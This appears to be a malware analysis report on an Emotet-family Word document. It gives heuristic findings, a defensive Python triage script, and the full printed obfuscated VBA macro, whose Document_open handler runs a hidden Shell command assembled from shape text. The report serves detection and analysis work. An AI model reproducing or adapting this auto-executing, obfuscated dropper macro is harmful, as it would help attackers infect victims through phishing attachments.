Verdict: MALICIOUS (Risk Score 232)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
The sample fires the critical OLE_VBA_SHELL heuristic: the macro calls Interaction.Shell() from inside an Array() expression in a Document_open handler, so it runs automatically when the document is opened. The command string passed to Shell() is not present in the macro source; it is assembled at run time from the text of a document shape (Shapes(...).TextFrame.ContainingRange) plus several undefined variables, and the window-style argument is a constant 0 (vbHide), so the child process starts without a visible window. The SC_STR_CMD heuristic reports that the resulting invocation is cmd.exe with an execution flag and obfuscated arguments. The ClamAV detection name 'Doc.Downloader.Emotet-6775097-0' strongly suggests the Emotet family, which commonly uses this technique to download and execute secondary payloads.
Heuristics (8)

- critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6775097-0
- medium OLE_VBA_MACROS, VBA macros detected (3 related findings): Document contains VBA macro code
- critical OLE_VBA_SHELL, Potential Shell call in VBA. Matched line in script: `End Select nMjzDYjYJ = Array(CJCvzViTJ, iXlcNilE, tZoKcC, Interaction.Shell(IlYKq, MYiASQ), poiFvc) Select Case mqlEESUSAhShbwUZwz`
- high OLE_VBA_PCODE_AUTOEXEC_EXEC, VBA p-code auto-exec with execution tokens: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- low OLE_VBA_DOCOPEN, Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next`
- high SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- info EXTRACTED_FILE_STATIC_TRIAGE, Suspicious extracted artifact: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- info EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace URI that ordinary Word markup carries, not a download location; the command the macro actually runs is assembled at run time from shape text, so any payload URL is not visible in the macro source shown below.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9000 bytes |

SHA-256: 347d6b366a5636dc58aa2625707fa7aee0c7252ba223c734156c634ef858905c

Detection (for the carved macros.bas, not the parent document):
- ClamAV: No threats found. The Emotet signature listed above matched the parent document, not the bare decoded VBA text, so the two ClamAV results do not conflict.
- Obfuscation or payload: likely. 196 of 235 identifiers look randomly generated (e.g. 'qMlFoLHajZHpMPtqqDOnkJbo'), consistent with name-mangling obfuscation.
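The structure the heuristics above describe (junk Select Case padding, a Shell() sink reached from an auto-exec handler, a command string that lives in a document shape rather than in the macro, and a high share of random-looking identifier names) can be triaged statically. The script below is an added example written for this page; it is not output of the analyzer and not part of oletools. It assumes the macro source has already been extracted to plain text (as in macros.bas) and runs on a constructed, abridged copy of the macro preview shown further down; the function names, the heuristic thresholds and the sample are the example's own.

```python
"""Static triage of an obfuscated VBA downloader macro (added example, not analyzer output).
Re-implements the checks behind this report's heuristics on olevba-style source:
auto-exec entry point, Shell() sink and window style, where the command string
comes from, dead Select Case removal, and the random-identifier obfuscation ratio."""
import re

# Constructed sample: an abridged copy of the macro previewed in this report.
# Only two of the junk Select Case blocks are kept; the live lines are verbatim.
SAMPLE_VBA = """Attribute VB_Name = "ikRfcHzaBSn"
Private Sub Document_open()
On Error Resume Next
Select Case QFipNBrkVKTmVUArwHjzN
Case 197552696
RKIQdpFuowXuCCWmUj = 130387971
PQiozZwpbUMTuIdNASXrUtz = ChrB(39545547 / ChrB(93672958))
Case 207091208
CDnHZjzWiIiOvUvzkIA = 311672524
End Select
Set JMFPESl = ikRfcHzaBSn.Shapes(CiXQtJvYf + "hJGsTkkCXRzq" + zLEFFtmAE).TextFrame
Select Case mhXOjwwScCVmKtakrcJAG
Case 339971014
ijPRvJCHCsISoFdMwG = 241062477
End Select
IlYKq = JMFPESl.ContainingRange + UnOPQq + DGttRL + JYFDjw
Const MYiASQ = 0
nMjzDYjYJ = Array(CJCvzViTJ, iXlcNilE, tZoKcC, Interaction.Shell(IlYKq, MYiASQ), poiFvc)
End Sub
"""

AUTOEXEC = re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b", re.I)
SHELL_CALL = re.compile(r"\b(?:Interaction\.)?Shell\s*\(\s*([^,()]+?)\s*,\s*(\w+)\s*\)", re.I)
SELECT_BLOCK = re.compile(r"^Select Case (\w+)\r?\n.*?^End Select\r?\n", re.M | re.S)
STRING_LIT = re.compile(r'"[^"\n]*"')
WINDOW_STYLE = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",   # VBA Shell() windowstyle values
                3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}

def assignment_of(name, src):
    """Right-hand side of the first `name = ...`, `Set name = ...` or `Const name = ...` line."""
    m = re.search(rf"^\s*(?:Set\s+|Const\s+)?{re.escape(name)}\s*=\s*(.+?)\s*$", src, re.M)
    return m.group(1) if m else None

def strip_dead_select_blocks(src):
    """Drop Select Case blocks whose selector is never assigned. Such a Variant is Empty,
    which compares equal to 0, so arms keyed on non-zero literals can never run: padding."""
    def dead(m):
        no_assignment = assignment_of(m.group(1), src) is None
        no_zero_arm = re.search(r"^\s*Case\s+(?:0|Else)\b", m.group(0), re.M) is None
        return no_assignment and no_zero_arm
    return SELECT_BLOCK.sub(lambda m: "" if dead(m) else m.group(0), src)

def looks_random(name):
    """Name-mangling heuristic: long names with many lower->upper flips, unlike CamelCase API names."""
    flips = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    return len(name) >= 8 and flips >= 3

def random_identifier_ratio(src):
    """(random_count, total_count, random_names) over identifiers outside string literals."""
    names = set(re.findall(r"\b[A-Za-z_]\w*\b", STRING_LIT.sub('""', src)))
    rnd = {n for n in names if looks_random(n)}
    return len(rnd), len(names), rnd

def trace(name, src, depth=4):
    """Follow a variable back through assignments to the object it is ultimately read from."""
    chain = []
    for _ in range(depth):
        rhs = assignment_of(name, src)
        if rhs is None:
            break
        chain.append(f"{name} = {rhs}")
        head = re.match(r"(\w+)\.", rhs)  # e.g. JMFPESl.ContainingRange -> follow JMFPESl
        if not head or head.group(1) == name:
            break
        name = head.group(1)
    return chain

def triage(src):
    cleaned = strip_dead_select_blocks(src)
    report = {"autoexec": sorted({m.lower() for m in AUTOEXEC.findall(cleaned)}),
              "dead_blocks_removed": len(SELECT_BLOCK.findall(src)) - len(SELECT_BLOCK.findall(cleaned)),
              "shell_call": None, "window_style": None,
              "command_chain": [], "command_in_shape_text": False}
    shell = SHELL_CALL.search(cleaned)
    if shell:
        cmd_arg, style_arg = shell.group(1), shell.group(2)
        report["shell_call"] = shell.group(0)
        # Window style may be a literal or resolve through a Const; 0 means no visible window.
        style = style_arg if style_arg.isdigit() else assignment_of(style_arg, cleaned)
        if style and style.isdigit():
            report["window_style"] = WINDOW_STYLE.get(int(style), style)
        report["command_chain"] = trace(cmd_arg, cleaned)
        # A command read from Shapes(...).TextFrame lives in the document body, not the macro.
        report["command_in_shape_text"] = any(".Shapes(" in step for step in report["command_chain"])
    return report

if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(f"{k}: {v}")
    n, total, _ = random_identifier_ratio(SAMPLE_VBA)
    print(f"random-looking identifiers: {n} of {total}")
```

Replace SAMPLE_VBA with the contents of macros.bas to run this on the real artifact. The dead-block test is deliberately conservative: a Select Case is dropped only when its selector is never assigned anywhere and no arm is Case 0 or Case Else, which is exactly the pattern this sample repeats 20 times. On the sample the Shell() window style resolves through Const MYiASQ = 0 to vbHide, and the command chain ends at Shapes(...).TextFrame, which tells the analyst that the next artifact to dump is the document's shape and text-box content, since the decoded VBA alone will never contain the command or any URL it fetches.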
Preview script (first 1,000 lines of the extracted script; this macro is 255 lines, so the preview is complete)
Attribute VB_Name = "ikRfcHzaBSn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case QFipNBrkVKTmVUArwHjzN
Case 197552696
RKIQdpFuowXuCCWmUj = 130387971
qDJqtlVMuikXmlQiFl = 95552863
PQiozZwpbUMTuIdNASXrUtz = ChrB(39545547 / ChrB(93672958))
IQlshjSYGZZVsUnjlZWRddID = mOXaWRYawRhEindAVBDo
Case 207091208
CDnHZjzWiIiOvUvzkIA = 311672524
DFcCmtQIcEOwMLTnOrpdcmZ = 146716032
sIFXRuokjzwLFnqjNC = ChrB(24081085 / ChrB(129091520))
iJbKVRKSSQjFiulKk = 69118791
End Select
Select Case mhXOjwwScCVmKtakrcJAG
Case 339971014
ijPRvJCHCsISoFdMwG = 241062477
DMaCSvTpitiinJtiRf = 3279918
ZvTtCblfOPMuVdT = ChrB(113162937 / ChrB(61427905))
zzqNZINdffLwvRGc = ItjzqKnaShkIKqcVEfARMVKj
Case 164452117
GUPUuotjKXdMIpDmHadVVoic = 279579920
FKknjAauESLwnwOdfFsrWL = 92677746
NjCDaRlmdIiivXoclOk = ChrB(239941103 / ChrB(179365290))
nhGrJdkwOuwJZzz = 154194607
End Select
Select Case TTKUDcajiZVpkYt
Case 315313549
bkrNcawQmAVaHuhm = 257510686
SbclCnLTdhzYvhNqlk = 7828163
qsOERbEJWioCzDaUhqhDBJw = ChrB(98394500 / ChrB(111486680))
FoMRJzltiaMXUaiC = zswbrGsIvCzrhvznDVQwFVrR
Case 25600122
AIJWGUzNzVUmOiUJOun = 12146560
iMkQESFriBfXRFkwYvcsUzdT = 114477279
hcwGwdCcVvZFBCu = ChrB(145708311 / ChrB(129246955))
pOwcjKpwLJcjiQwzkc = 308403261
End Select
Select Case kJGGjdpuaPMpIjWiurIC
Case 77921048
zuthjUmoWKRlhRpIDQSwUWJO = 183856992
IUdvnkTmJLMCwUImtBYW = 336485440
smnskNcdkiFAMSK = ChrB(179751743 / ChrB(149644320))
RuIivBTzqicHqEjDcrHv = GKjaiwwHqbRfrF
Case 31528204
NrlYmXuAcoAUJpTTbjLjbENF = 155296793
zGKczzbGOzVWNjQfztvbwA = 50781171
DKtUVJijBzXnpApAsCbUzFTc = ChrB(130971403 / ChrB(316338052))
TJvrzzMZoGGlFUp = 139434703
End Select
Select Case SPKnoMVDAziDnsO
Case 268473118
JSrwItKzcSAEFf = 33303271
rpUscCuoLOORWYSMH = 265144455
tMMJWzqMuVwuSZmwDtwXHYDk = ChrB(303399245 / ChrB(205203638))
aDzozRjLFifwsmpzTNTvsjc = SLQoUIbPrGQJuhBcj
Case 90142509
RXvDlRYkXajAqakVlBuqw = 20925612
HmVfFlMqMiCLsWIiW = 316297456
DpHFZjKLPboXkOHoRPm = ChrB(127660816 / ChrB(332710753))
jWWoPszdWXuYzazj = 321271219
End Select
Select Case HUOwMcdOLJHiFiEsGvvEBill
Case 136325854
CLvwzdKNHMaoGMuJ = 16379839
rkRjCYjLrNzcicbw = 174557565
TMLiTrasRSoiJsbau = ChrB(240115594 / ChrB(315328481))
IWSmlzQidzMImcqpz = QaJJHOXJDEBHirCI
Case 60394139
uZsWavOTFjwhBmbjUVIzPEPc = 303927143
dWPUGdTtvaVuzOun = 55209273
MWDPjCXhzJhpKQbORsEkZSN = ChrB(53765012 / ChrB(280893717))
LZVuEcwYPXIOpM = 325242938
End Select
Set JMFPESl = ikRfcHzaBSn.Shapes(CiXQtJvYf + "hJGsTkkCXRzq" + zLEFFtmAE).TextFrame
Select Case GDLVifpsNsWnnOzpZHD
Case 296834056
FDCorQJOCQlJlSA = 308366601
wYYlfGUvcqFJOmhzWBzJjnP = 212087119
LbkiBwzuiIiUTawisOZE = ChrB(31250559 / ChrB(263012728))
ELPRAlKLJsHTijRauGPf = CcCbDbnYpcZXzjTmiwIX
Case 324508205
cLGSwboizpIACiMqzK = 150010034
TQhwhDzoQIGHjjAqUkdMkK = 200707076
PwikZoAwBKCMiJkudzOpj = ChrB(941250 / ChrB(136351406))
iVVMhKCIlzhkZNObHH = 44362181
End Select
Select Case JTqQNlNjizMRwJGZ
Case 143838122
SIvIbSOpjdjLrFFbdOld = 243258070
fcbNlKTDqXvjwBO = 4208892
XCYEkwXIHLXfrnsrMdTjNjD = ChrB(146797478 / ChrB(195860742))
MPLHEMcWNaMBvfEEiwvXwj = olYvTirwCawkIz
Case 3010485
LCVaRfKhncJCEaG = 267041861
LWVfQJrWcKbwvwHdrjUd = 63921872
IbqIrVoubUIHwafbvtdDp = ChrB(136422121 / ChrB(230412524))
rjBYMrlKSaNtpHRWhhjHq = 260388096
End Select
Select Case YtwiTNdBwsknCQPMfwqlhYmc
Case 281626043
jEwVFEImCzFCBMSBLSbrWk = 119739775
bDaORAGVnjdZFdnjiQOQ = 41703947
ziSjMUBzQzmQuCdtUBsk = ChrB(96386739 / ChrB(139655173))
twifuMFWCYwFwwlomUoPi = oilDkvMXWOcvZkipGmKcks
Case 319803116
hzjNFPaFEGIztrbKKiCjdAWB = 64519120
NBEBCvloWmMwSGoWqSbivPKA = 121770917
pMSjbiEHBYBDEMO = ChrB(32541167 / ChrB(135606264))
zMMwvHJEZfCwrDiwGYWqLd = 303970696
End Select
IlYKq = JMFPESl.ContainingRange + UnOPQq + DGttRL + JYFDjw + Fpiid + BrjmWp + MDWAcC + LTpUV + iWSGK
Select Case liSckXQfiUQfENjMcWsJtti
Case 187164875
DzswDqjAothTzLqMK = 201604770
oYsUVfJUViBrEqM = 217247720
XiaihiQTzsiLBziOWor = ChrB(75222834 / ChrB(191972105))
QuVNRmCcdliQobEdGu = BWmiJUlSdhCUVwBSfIT
Case 83857104
RWOthkJGKthzjczdPMtj = 135714254
vbRIUmJYUnhwjAYlbjb = 76711863
oUWlUCoQvajIsbmbY = ChrB(106789537 / ChrB(152486109))
lYtQlswFdkJFIGHGuWzkVIZN = 9022965
End Select
Select Case WmUIUMMBYYZBRtkF
Case 28431826
suMoIvwAVnMjhEtiKkqff = 238984763
oYrihiuUhZhvQwiiYJTqY = 269957524
rVIiizOYDHKYPQQRSbTfGzJ = ChrB(194652512 / ChrB(237170925))
GRVMtLzfAJZzLUTBinFZ = NIsAPFJmsMiwGtwCr
Case 93244142
ZjQHrTQwLEVVYKJsJcLiFptI = 322115486
AEbWwmZGAjzBAhzHwhXrGow = 6072644
ZfjtkpHKzTLWpGivRKauIc = ChrB(198395135 / ChrB(206267773))
qMlFoLHajZHpMPtqqDOnkJbo = 311345539
End Select
Select Case uNpikoBMZlMiMs
Case 170184484
JaRbzFVUpYSkfiJHYdqiVQw = 324529620
sCTYhKWtskjSNDosV = 300245799
WQhucFKiBrYsdUIH = ChrB(22116688 / ChrB(12013634))
HOvqmtdpLZCqAXkaCLHrTWbV = TrCzEwlqZlwbZu
Case 5493347
QzIzBYVstGwvKbkmaoTCarGd = 115173984
almzcQGsDXTVBvVJEzApjzAL = 5546648
bwYYsfhBzkGtifoRYNTEm = ChrB(157749551 / ChrB(214919951))
mJdcTdkazqpIUiino = 1620402
End Select
Select Case XjmVOzapFFFcBDRnCP
Case 308009121
DaiOSdZZFMcAsfsGoIkjoHw = 126916025
rfnjHXckwSzBYClXA = 234725440
dFjWKKwufLDwiLAbzmqwozP = ChrB(316615307 / ChrB(82679068))
EQFzMnXDpJHJdYIdzZtVSqXb = kKlEdpnJOFhofzPZbVqToJ
Case 113587183
LCqCqcOsiLbcmwLTTzOTbo = 114104162
iwrUhHzbtvsbzlTlqoK = 136159602
mncKXzouwOXlQYukuLW = ChrB(74269894 / ChrB(1455523))
rGkUijccmiwCrJPKKHLjv = 213376484
End Select
Select Case NtkHqCOZEdBVjofMbXJDOl
Case 248873808
SvBqpTBBjrWczuYzFOGH = 301479617
oSwThTdaacHGpuBXj = 243155071
zmpRDMhwMwziikCHiuV = ChrB(246306318 / ChrB(220257930))
IRuUtEivhfVfuczAsH = URcazcVmnTdNzu
Case 184828019
YXiTcURQUIzqaHhBOlMF = 205801367
wrXSqbERWkSzbdKnXzAMFpd = 204371731
jlczOhWzhaqvKipL = ChrB(22806252 / ChrB(252819708))
YcjDraNNFSkHOsGKq = 184968943
End Select
Select Case ruRiEzlXKIrtHh
Case 206681885
wjqoJBMQRYCiEMhMp = 338039845
WOOPdRjJqsrWizMpQhtr = 281047702
BRfwHSwaiDIFIDiUMXcrV = ChrB(159161505 / ChrB(165103731))
YjsWQivHmoNzjh = NLPOoOZoJHwVWOwM
Case 190713314
dXaabKzIASUpklfNPjFKknz = 294680227
PUJZsnckFFJinkFOjNGUT = 152820701
pIzSGSHqXiqLpqiI = ChrB(206410056 / ChrB(285795477))
ifVfcwzvEZtYQrJ = 130387316
End Select
Const MYiASQ = 0
Select Case KHYDfERqjiWwLrGjutYGpL
Case 87272216
HCqOkJtaOrzwmVvNmvFpAlji = 25316843
hjBTwzuZwdODFXpw = 238082632
rHtYwLTuGXwWWHKXcK = ChrB(162853663 / ChrB(309008751))
AEMZSzjphAEBLqvTIkqzDsX = aGGsiufXpbrDhzjLkEY
Case 151264258
ULRODUZhvpHhmzLsqHnVhMj = 340146003
mJEiOwUAjFvpiiaFptmjWvz = 133033865
uzkBMIbRWRLUDjqnjF = ChrB(303490904 / ChrB(107719539))
MdNPrSzQVrJkLU = 10507286
End Select
Select Case BziAmWwPuwwHqVEkBiqQHaLO
Case 234234766
qwXAuwLNYUBWfsLFtkScoKTw = 139937864
iCobnPQofAstBCvdwkjf = 336971081
FChbwGKfiYiSRJYzjlFqNKNz = ChrB(232254031 / ChrB(105648661))
KOjPpdhwmtMTJizWTPik = EwDzZIjuphsjazRuJpokMm
Case 24772352
SwMNntkAfuGPfRPVzC = 323986608
UmjfibJZuAZRvkfd = 317134210
GvzrAfsCPsZTmKprzf = ChrB(84972922 / ChrB(214631868))
MkKFfUoUvmmZavBOcmDm = 213675115
End Select
Select Case bqQsiwrLNjBAoZOGHVttrcG
Case 28708172
rQKTRkdNwCfdQKz = 58217552
zwQFXrvfOnpHzwk = 77561641
rhhrvvXmsXjdqKtljfIoAU = ChrB(169358077 / ChrB(98435911))
CzoGwEvRdTSbQBCsSiTMCX = vWPSbXnWHSDswjjvTnMN
Case 284656947
JTdFvhpFClfUtkhlTtp = 321544175
JNIEJmjAYqJlTMwp = 145611096
FhCPRNdpwOhTSXuRAFUB = ChrB(248866050 / ChrB(308885329))
EdvVjaXkwzRkPHt = 310872346
End Select
Select Case mhLLwHpWHnNAuAGsGDIHjdEZ
Case 53975378
jchUYwDvZHrXnpGKz = 189345694
dKFuaZzuZMJdmDiXMomOO = 323031582
bzBjQTAZjbpiEiiGvaDiiQiF = ChrB(128297606 / ChrB(30792703))
tVKOVjLivZphbYndB = YitiiroLSQKUwQLBGDVNTwtz
Case 253453705
GscFvmcIuaYPnTZKNvTa = 193763453
WaRjHndaltsBlviMVYr = 262386121
kcrQBnIkzjLDhWCoLi = ChrB(269821998 / ChrB(202549145))
pfWmiicBavjpDlzZSF = 1062228
End Select
nMjzDYjYJ = Array(CJCvzViTJ, iXlcNilE, tZoKcC, Interaction.Shell(IlYKq, MYiASQ), poiFvc)
Select Case mqlEESUSAhShbwUZwz
Case 251329651
BIsICwrWAKhPcE = 43377898
tlkmQnFBcABzkkHpMTTdwc = 18099088
azSqADEWpjfMMzm = ChrB(94572894 / ChrB(19567207))
fCvrlPDrDJlcpQidLSUPBZ = iJDEudMjEaIzAMjLCmIzulNr
Case 97728898
ioTtnoFGQhiLJOrdjBjT = 222418773
bGRdtZAtwMpPuXNLn = 132603564
tvBdrdtIRELKuwSMMbKvfFX = ChrB(244601677 / ChrB(139902660))
tTTQVOMcnUacaAzRjo = 247877836
End Select
End Sub